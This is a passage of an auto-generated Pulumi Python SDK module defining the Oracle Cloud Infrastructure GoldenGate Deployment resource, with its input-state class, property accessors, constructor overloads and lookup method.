def compartment_id(self, value: pulumi.Input[str]):
pulumi.set(self, "compartment_id", value)
@property
@pulumi.getter(name="cpuCoreCount")
def cpu_core_count(self) -> pulumi.Input[int]:
"""
(Updatable) The Minimum number of OCPUs to be made available for this Deployment.
"""
return pulumi.get(self, "cpu_core_count")
@cpu_core_count.setter
def cpu_core_count(self, value: pulumi.Input[int]):
pulumi.set(self, "cpu_core_count", value)
@property
@pulumi.getter(name="deploymentType")
def deployment_type(self) -> pulumi.Input[str]:
"""
The deployment type.
"""
return pulumi.get(self, "deployment_type")
@deployment_type.setter
def deployment_type(self, value: pulumi.Input[str]):
pulumi.set(self, "deployment_type", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Input[str]:
"""
(Updatable) An object's Display Name.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: pulumi.Input[str]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="isAutoScalingEnabled")
def is_auto_scaling_enabled(self) -> pulumi.Input[bool]:
"""
(Updatable) Indicates if auto scaling is enabled for the Deployment's CPU core count.
"""
return pulumi.get(self, "is_auto_scaling_enabled")
@is_auto_scaling_enabled.setter
def is_auto_scaling_enabled(self, value: pulumi.Input[bool]):
pulumi.set(self, "is_auto_scaling_enabled", value)
@property
@pulumi.getter(name="licenseModel")
def license_model(self) -> pulumi.Input[str]:
"""
(Updatable) The Oracle license model that applies to a Deployment.
"""
return pulumi.get(self, "license_model")
@license_model.setter
def license_model(self, value: pulumi.Input[str]):
pulumi.set(self, "license_model", value)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> pulumi.Input[str]:
"""
(Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the subnet being referenced.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: pulumi.Input[str]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Tags defined for this resource. Each key is predefined and scoped to a namespace. Example: `{"foo-namespace.bar-key": "value"}`
"""
return pulumi.get(self, "defined_tags")
@defined_tags.setter
def defined_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "defined_tags", value)
@property
@pulumi.getter(name="deploymentBackupId")
def deployment_backup_id(self) -> Optional[pulumi.Input[str]]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the backup being referenced.
"""
return pulumi.get(self, "deployment_backup_id")
@deployment_backup_id.setter
def deployment_backup_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "deployment_backup_id", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Metadata about this specific object.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def fqdn(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) A three-label Fully Qualified Domain Name (FQDN) for a resource.
"""
return pulumi.get(self, "fqdn")
@fqdn.setter
def fqdn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "fqdn", value)
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) A simple key-value pair that is applied without any predefined name, type, or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
"""
return pulumi.get(self, "freeform_tags")
@freeform_tags.setter
def freeform_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "freeform_tags", value)
@property
@pulumi.getter(name="isPublic")
def is_public(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) True if this object is publicly available.
"""
return pulumi.get(self, "is_public")
@is_public.setter
def is_public(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_public", value)
@property
@pulumi.getter(name="nsgIds")
def nsg_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
(Updatable) An array of [Network Security Group](https://docs.cloud.oracle.com/iaas/Content/Network/Concepts/networksecuritygroups.htm) OCIDs used to define network access for a deployment.
"""
return pulumi.get(self, "nsg_ids")
@nsg_ids.setter
def nsg_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "nsg_ids", value)
@property
@pulumi.getter(name="oggData")
def ogg_data(self) -> Optional[pulumi.Input['DeploymentOggDataArgs']]:
"""
(Updatable) Deployment Data for creating an OggDeployment
"""
return pulumi.get(self, "ogg_data")
@ogg_data.setter
def ogg_data(self, value: Optional[pulumi.Input['DeploymentOggDataArgs']]):
pulumi.set(self, "ogg_data", value)
@pulumi.input_type
class _DeploymentState:
def __init__(__self__, *,
compartment_id: Optional[pulumi.Input[str]] = None,
cpu_core_count: Optional[pulumi.Input[int]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
deployment_backup_id: Optional[pulumi.Input[str]] = None,
deployment_type: Optional[pulumi.Input[str]] = None,
deployment_url: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
fqdn: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
is_auto_scaling_enabled: Optional[pulumi.Input[bool]] = None,
is_healthy: Optional[pulumi.Input[bool]] = None,
is_latest_version: Optional[pulumi.Input[bool]] = None,
is_public: Optional[pulumi.Input[bool]] = None,
license_model: Optional[pulumi.Input[str]] = None,
lifecycle_details: Optional[pulumi.Input[str]] = None,
nsg_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
ogg_data: Optional[pulumi.Input['DeploymentOggDataArgs']] = None,
private_ip_address: Optional[pulumi.Input[str]] = None,
public_ip_address: Optional[pulumi.Input[str]] = None,
state: Optional[pulumi.Input[str]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
system_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
time_created: Optional[pulumi.Input[str]] = None,
time_updated: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Deployment resources.
:param pulumi.Input[str] compartment_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment being referenced.
:param pulumi.Input[int] cpu_core_count: (Updatable) The Minimum number of OCPUs to be made available for this Deployment.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Tags defined for this resource. Each key is predefined and scoped to a namespace. Example: `{"foo-namespace.bar-key": "value"}`
:param pulumi.Input[str] deployment_backup_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the backup being referenced.
:param pulumi.Input[str] deployment_type: The deployment type.
:param pulumi.Input[str] deployment_url: The URL of a resource.
:param pulumi.Input[str] description: (Updatable) Metadata about this specific object.
:param pulumi.Input[str] display_name: (Updatable) An object's Display Name.
:param pulumi.Input[str] fqdn: (Updatable) A three-label Fully Qualified Domain Name (FQDN) for a resource.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) A simple key-value pair that is applied without any predefined name, type, or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
:param pulumi.Input[bool] is_auto_scaling_enabled: (Updatable) Indicates if auto scaling is enabled for the Deployment's CPU core count.
:param pulumi.Input[bool] is_healthy: True if all of the aggregate resources are working correctly.
:param pulumi.Input[bool] is_latest_version: Indicates if the resource is the latest available version.
:param pulumi.Input[bool] is_public: (Updatable) True if this object is publicly available.
:param pulumi.Input[str] license_model: (Updatable) The Oracle license model that applies to a Deployment.
:param pulumi.Input[str] lifecycle_details: Describes the object's current state in detail. For example, it can be used to provide actionable information for a resource in a Failed state.
:param pulumi.Input[Sequence[pulumi.Input[str]]] nsg_ids: (Updatable) An array of [Network Security Group](https://docs.cloud.oracle.com/iaas/Content/Network/Concepts/networksecuritygroups.htm) OCIDs used to define network access for a deployment.
:param pulumi.Input['DeploymentOggDataArgs'] ogg_data: (Updatable) Deployment Data for creating an OggDeployment
:param pulumi.Input[str] private_ip_address: The private IP address in the customer's VCN representing the access point for the associated endpoint service in the GoldenGate service VCN.
:param pulumi.Input[str] public_ip_address: The public IP address representing the access point for the Deployment.
:param pulumi.Input[str] state: Possible lifecycle states.
:param pulumi.Input[str] subnet_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the subnet being referenced.
:param pulumi.Input[Mapping[str, Any]] system_tags: The system tags associated with this resource, if any. The system tags are set by Oracle Cloud Infrastructure services. Each key is predefined and scoped to namespaces. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{orcl-cloud: {free-tier-retain: true}}`
:param pulumi.Input[str] time_created: The time the resource was created. The format is defined by [RFC3339](https://tools.ietf.org/html/rfc3339), such as `2016-08-25T21:10:29.600Z`.
:param pulumi.Input[str] time_updated: The time the resource was last updated. The format is defined by [RFC3339](https://tools.ietf.org/html/rfc3339), such as `2016-08-25T21:10:29.600Z`.
"""
if compartment_id is not None:
pulumi.set(__self__, "compartment_id", compartment_id)
if cpu_core_count is not None:
pulumi.set(__self__, "cpu_core_count", cpu_core_count)
if defined_tags is not None:
pulumi.set(__self__, "defined_tags", defined_tags)
if deployment_backup_id is not None:
pulumi.set(__self__, "deployment_backup_id", deployment_backup_id)
if deployment_type is not None:
pulumi.set(__self__, "deployment_type", deployment_type)
if deployment_url is not None:
pulumi.set(__self__, "deployment_url", deployment_url)
if description is not None:
pulumi.set(__self__, "description", description)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if fqdn is not None:
pulumi.set(__self__, "fqdn", fqdn)
if freeform_tags is not None:
pulumi.set(__self__, "freeform_tags", freeform_tags)
if is_auto_scaling_enabled is not None:
pulumi.set(__self__, "is_auto_scaling_enabled", is_auto_scaling_enabled)
if is_healthy is not None:
pulumi.set(__self__, "is_healthy", is_healthy)
if is_latest_version is not None:
pulumi.set(__self__, "is_latest_version", is_latest_version)
if is_public is not None:
pulumi.set(__self__, "is_public", is_public)
if license_model is not None:
pulumi.set(__self__, "license_model", license_model)
if lifecycle_details is not None:
pulumi.set(__self__, "lifecycle_details", lifecycle_details)
if nsg_ids is not None:
pulumi.set(__self__, "nsg_ids", nsg_ids)
if ogg_data is not None:
pulumi.set(__self__, "ogg_data", ogg_data)
if private_ip_address is not None:
pulumi.set(__self__, "private_ip_address", private_ip_address)
if public_ip_address is not None:
pulumi.set(__self__, "public_ip_address", public_ip_address)
if state is not None:
pulumi.set(__self__, "state", state)
if subnet_id is not None:
pulumi.set(__self__, "subnet_id", subnet_id)
if system_tags is not None:
pulumi.set(__self__, "system_tags", system_tags)
if time_created is not None:
pulumi.set(__self__, "time_created", time_created)
if time_updated is not None:
pulumi.set(__self__, "time_updated", time_updated)
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment being referenced.
"""
return pulumi.get(self, "compartment_id")
@compartment_id.setter
def compartment_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "compartment_id", value)
@property
@pulumi.getter(name="cpuCoreCount")
def cpu_core_count(self) -> Optional[pulumi.Input[int]]:
"""
(Updatable) The Minimum number of OCPUs to be made available for this Deployment.
"""
return pulumi.get(self, "cpu_core_count")
@cpu_core_count.setter
def cpu_core_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cpu_core_count", value)
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Tags defined for this resource. Each key is predefined and scoped to a namespace. Example: `{"foo-namespace.bar-key": "value"}`
"""
return pulumi.get(self, "defined_tags")
@defined_tags.setter
def defined_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "defined_tags", value)
@property
@pulumi.getter(name="deploymentBackupId")
def deployment_backup_id(self) -> Optional[pulumi.Input[str]]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the backup being referenced.
"""
return pulumi.get(self, "deployment_backup_id")
@deployment_backup_id.setter
def deployment_backup_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "deployment_backup_id", value)
@property
@pulumi.getter(name="deploymentType")
def deployment_type(self) -> Optional[pulumi.Input[str]]:
"""
The deployment type.
"""
return pulumi.get(self, "deployment_type")
@deployment_type.setter
def deployment_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "deployment_type", value)
@property
@pulumi.getter(name="deploymentUrl")
def deployment_url(self) -> Optional[pulumi.Input[str]]:
"""
The URL of a resource.
"""
return pulumi.get(self, "deployment_url")
@deployment_url.setter
def deployment_url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "deployment_url", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Metadata about this specific object.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) An object's Display Name.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter
def fqdn(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) A three-label Fully Qualified Domain Name (FQDN) for a resource.
"""
return pulumi.get(self, "fqdn")
@fqdn.setter
def fqdn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "fqdn", value)
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) A simple key-value pair that is applied without any predefined name, type, or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
"""
return pulumi.get(self, "freeform_tags")
@freeform_tags.setter
def freeform_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "freeform_tags", value)
@property
@pulumi.getter(name="isAutoScalingEnabled")
def is_auto_scaling_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) Indicates if auto scaling is enabled for the Deployment's CPU core count.
"""
return pulumi.get(self, "is_auto_scaling_enabled")
@is_auto_scaling_enabled.setter
def is_auto_scaling_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_auto_scaling_enabled", value)
@property
@pulumi.getter(name="isHealthy")
def is_healthy(self) -> Optional[pulumi.Input[bool]]:
"""
True if all of the aggregate resources are working correctly.
"""
return pulumi.get(self, "is_healthy")
@is_healthy.setter
def is_healthy(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_healthy", value)
@property
@pulumi.getter(name="isLatestVersion")
def is_latest_version(self) -> Optional[pulumi.Input[bool]]:
"""
Indicates if the resource is the latest available version.
"""
return pulumi.get(self, "is_latest_version")
@is_latest_version.setter
def is_latest_version(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_latest_version", value)
@property
@pulumi.getter(name="isPublic")
def is_public(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) True if this object is publicly available.
"""
return pulumi.get(self, "is_public")
@is_public.setter
def is_public(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_public", value)
@property
@pulumi.getter(name="licenseModel")
def license_model(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The Oracle license model that applies to a Deployment.
"""
return pulumi.get(self, "license_model")
@license_model.setter
def license_model(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "license_model", value)
@property
@pulumi.getter(name="lifecycleDetails")
def lifecycle_details(self) -> Optional[pulumi.Input[str]]:
"""
Describes the object's current state in detail. For example, it can be used to provide actionable information for a resource in a Failed state.
"""
return pulumi.get(self, "lifecycle_details")
@lifecycle_details.setter
def lifecycle_details(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "lifecycle_details", value)
@property
@pulumi.getter(name="nsgIds")
def nsg_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
(Updatable) An array of [Network Security Group](https://docs.cloud.oracle.com/iaas/Content/Network/Concepts/networksecuritygroups.htm) OCIDs used to define network access for a deployment.
"""
return pulumi.get(self, "nsg_ids")
@nsg_ids.setter
def nsg_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "nsg_ids", value)
@property
@pulumi.getter(name="oggData")
def ogg_data(self) -> Optional[pulumi.Input['DeploymentOggDataArgs']]:
"""
(Updatable) Deployment Data for creating an OggDeployment
"""
return pulumi.get(self, "ogg_data")
@ogg_data.setter
def ogg_data(self, value: Optional[pulumi.Input['DeploymentOggDataArgs']]):
pulumi.set(self, "ogg_data", value)
@property
@pulumi.getter(name="privateIpAddress")
def private_ip_address(self) -> Optional[pulumi.Input[str]]:
"""
The private IP address in the customer's VCN representing the access point for the associated endpoint service in the GoldenGate service VCN.
"""
return pulumi.get(self, "private_ip_address")
@private_ip_address.setter
def private_ip_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_ip_address", value)
@property
@pulumi.getter(name="publicIpAddress")
def public_ip_address(self) -> Optional[pulumi.Input[str]]:
"""
The public IP address representing the access point for the Deployment.
"""
return pulumi.get(self, "public_ip_address")
@public_ip_address.setter
def public_ip_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "public_ip_address", value)
@property
@pulumi.getter
def state(self) -> Optional[pulumi.Input[str]]:
"""
Possible lifecycle states.
"""
return pulumi.get(self, "state")
@state.setter
def state(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "state", value)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the subnet being referenced.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter(name="systemTags")
def system_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
The system tags associated with this resource, if any. The system tags are set by Oracle Cloud Infrastructure services. Each key is predefined and scoped to namespaces. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{orcl-cloud: {free-tier-retain: true}}`
"""
return pulumi.get(self, "system_tags")
@system_tags.setter
def system_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "system_tags", value)
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> Optional[pulumi.Input[str]]:
"""
The time the resource was created. The format is defined by [RFC3339](https://tools.ietf.org/html/rfc3339), such as `2016-08-25T21:10:29.600Z`.
"""
return pulumi.get(self, "time_created")
@time_created.setter
def time_created(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_created", value)
@property
@pulumi.getter(name="timeUpdated")
def time_updated(self) -> Optional[pulumi.Input[str]]:
"""
The time the resource was last updated. The format is defined by [RFC3339](https://tools.ietf.org/html/rfc3339), such as `2016-08-25T21:10:29.600Z`.
"""
return pulumi.get(self, "time_updated")
@time_updated.setter
def time_updated(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_updated", value)
class Deployment(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
cpu_core_count: Optional[pulumi.Input[int]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
deployment_backup_id: Optional[pulumi.Input[str]] = None,
deployment_type: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
fqdn: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
is_auto_scaling_enabled: Optional[pulumi.Input[bool]] = None,
is_public: Optional[pulumi.Input[bool]] = None,
license_model: Optional[pulumi.Input[str]] = None,
nsg_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
ogg_data: Optional[pulumi.Input[pulumi.InputType['DeploymentOggDataArgs']]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
This resource provides the Deployment resource in Oracle Cloud Infrastructure Golden Gate service.
Creates a new Deployment.
## Import
Deployments can be imported using the `id`, e.g.
```sh
$ pulumi import oci:goldengate/deployment:Deployment test_deployment "id"
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] compartment_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment being referenced.
:param pulumi.Input[int] cpu_core_count: (Updatable) The Minimum number of OCPUs to be made available for this Deployment.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Tags defined for this resource. Each key is predefined and scoped to a namespace. Example: `{"foo-namespace.bar-key": "value"}`
:param pulumi.Input[str] deployment_backup_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the backup being referenced.
:param pulumi.Input[str] deployment_type: The deployment type.
:param pulumi.Input[str] description: (Updatable) Metadata about this specific object.
:param pulumi.Input[str] display_name: (Updatable) An object's Display Name.
:param pulumi.Input[str] fqdn: (Updatable) A three-label Fully Qualified Domain Name (FQDN) for a resource.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) A simple key-value pair that is applied without any predefined name, type, or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
:param pulumi.Input[bool] is_auto_scaling_enabled: (Updatable) Indicates if auto scaling is enabled for the Deployment's CPU core count.
:param pulumi.Input[bool] is_public: (Updatable) True if this object is publicly available.
:param pulumi.Input[str] license_model: (Updatable) The Oracle license model that applies to a Deployment.
:param pulumi.Input[Sequence[pulumi.Input[str]]] nsg_ids: (Updatable) An array of [Network Security Group](https://docs.cloud.oracle.com/iaas/Content/Network/Concepts/networksecuritygroups.htm) OCIDs used to define network access for a deployment.
:param pulumi.Input[pulumi.InputType['DeploymentOggDataArgs']] ogg_data: (Updatable) Deployment Data for creating an OggDeployment
:param pulumi.Input[str] subnet_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the subnet being referenced.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: DeploymentArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
This resource provides the Deployment resource in Oracle Cloud Infrastructure Golden Gate service.
Creates a new Deployment.
## Import
Deployments can be imported using the `id`, e.g.
```sh
$ pulumi import oci:goldengate/deployment:Deployment test_deployment "id"
```
:param str resource_name: The name of the resource.
:param DeploymentArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(DeploymentArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
cpu_core_count: Optional[pulumi.Input[int]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
deployment_backup_id: Optional[pulumi.Input[str]] = None,
deployment_type: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
fqdn: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
is_auto_scaling_enabled: Optional[pulumi.Input[bool]] = None,
is_public: Optional[pulumi.Input[bool]] = None,
license_model: Optional[pulumi.Input[str]] = None,
nsg_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
ogg_data: Optional[pulumi.Input[pulumi.InputType['DeploymentOggDataArgs']]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = DeploymentArgs.__new__(DeploymentArgs)
if compartment_id is None and not opts.urn:
raise TypeError("Missing required property 'compartment_id'")
__props__.__dict__["compartment_id"] = compartment_id
if cpu_core_count is None and not opts.urn:
raise TypeError("Missing required property 'cpu_core_count'")
__props__.__dict__["cpu_core_count"] = cpu_core_count
__props__.__dict__["defined_tags"] = defined_tags
__props__.__dict__["deployment_backup_id"] = deployment_backup_id
if deployment_type is None and not opts.urn:
raise TypeError("Missing required property 'deployment_type'")
__props__.__dict__["deployment_type"] = deployment_type
__props__.__dict__["description"] = description
if display_name is None and not opts.urn:
raise TypeError("Missing required property 'display_name'")
__props__.__dict__["display_name"] = display_name
__props__.__dict__["fqdn"] = fqdn
__props__.__dict__["freeform_tags"] = freeform_tags
if is_auto_scaling_enabled is None and not opts.urn:
raise TypeError("Missing required property 'is_auto_scaling_enabled'")
__props__.__dict__["is_auto_scaling_enabled"] = is_auto_scaling_enabled
__props__.__dict__["is_public"] = is_public
if license_model is None and not opts.urn:
raise TypeError("Missing required property 'license_model'")
__props__.__dict__["license_model"] = license_model
__props__.__dict__["nsg_ids"] = nsg_ids
__props__.__dict__["ogg_data"] = ogg_data
if subnet_id is None and not opts.urn:
raise TypeError("Missing required property 'subnet_id'")
__props__.__dict__["subnet_id"] = subnet_id
__props__.__dict__["deployment_url"] = None
__props__.__dict__["is_healthy"] = None
__props__.__dict__["is_latest_version"] = None
__props__.__dict__["lifecycle_details"] = None
__props__.__dict__["private_ip_address"] = None
__props__.__dict__["public_ip_address"] = None
__props__.__dict__["state"] = None
__props__.__dict__["system_tags"] = None
__props__.__dict__["time_created"] = None
__props__.__dict__["time_updated"] = None
super(Deployment, __self__).__init__(
'oci:goldengate/deployment:Deployment',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
cpu_core_count: Optional[pulumi.Input[int]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
deployment_backup_id: Optional[pulumi.Input[str]] = None,
deployment_type: Optional[pulumi.Input[str]] = None,
deployment_url: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
fqdn: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
is_auto_scaling_enabled: Optional[pulumi.Input[bool]] = None,
is_healthy: Optional[pulumi.Input[bool]] = None,
is_latest_version: Optional[pulumi.Input[bool]] = None,
is_public: Optional[pulumi.Input[bool]] = None,
license_model: Optional[pulumi.Input[str]] = None,
lifecycle_details: Optional[pulumi.Input[str]] = None,
nsg_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
ogg_data: Optional[pulumi.Input[pulumi.InputType['DeploymentOggDataArgs']]] = None,
private_ip_address: Optional[pulumi.Input[str]] = None,
public_ip_address: Optional[pulumi.Input[str]] = None,
state: Optional[pulumi.Input[str]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
system_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
time_created: Optional[pulumi.Input[str]] = None,
time_updated: Optional[pulumi.Input[str]] = None) -> 'Deployment':
"""
Get an existing Deployment resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] compartment_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment being referenced.
:param pulumi.Input[int] cpu_core_count: (Updatable) The Minimum number of OCPUs to be made available for this Deployment.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Tags defined for this resource. Each key is predefined and scoped to a namespace. Example: `{"foo-namespace.bar-key": "value"}`
:param pulumi.Input[str] deployment_backup_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the backup being referenced.
:param pulumi.Input[str] deployment_type: The deployment type.
:param pulumi.Input[str] deployment_url: The URL of a resource.
:param pulumi.Input[str] description: (Updatable) Metadata about this specific object.
:param pulumi.Input[str] display_name: (Updatable) An object's Display Name.
:param pulumi.Input[str] fqdn: (Updatable) A three-label Fully Qualified Domain Name (FQDN) for a resource.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) A simple key-value pair that is applied without any predefined name, type, or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
:param pulumi.Input[bool] is_auto_scaling_enabled: (Updatable) Indicates if auto scaling is enabled for the Deployment's CPU core count.
:param pulumi.Input[bool] is_healthy: True if all of the aggregate resources are working correctly.
:param pulumi.Input[bool] is_latest_version: Indicates if the resource is the latest available version.
:param pulumi.Input[bool] is_public: (Updatable) True if this object is publicly available.
:param pulumi.Input[str] license_model: (Updatable) The Oracle license model that applies to a Deployment.
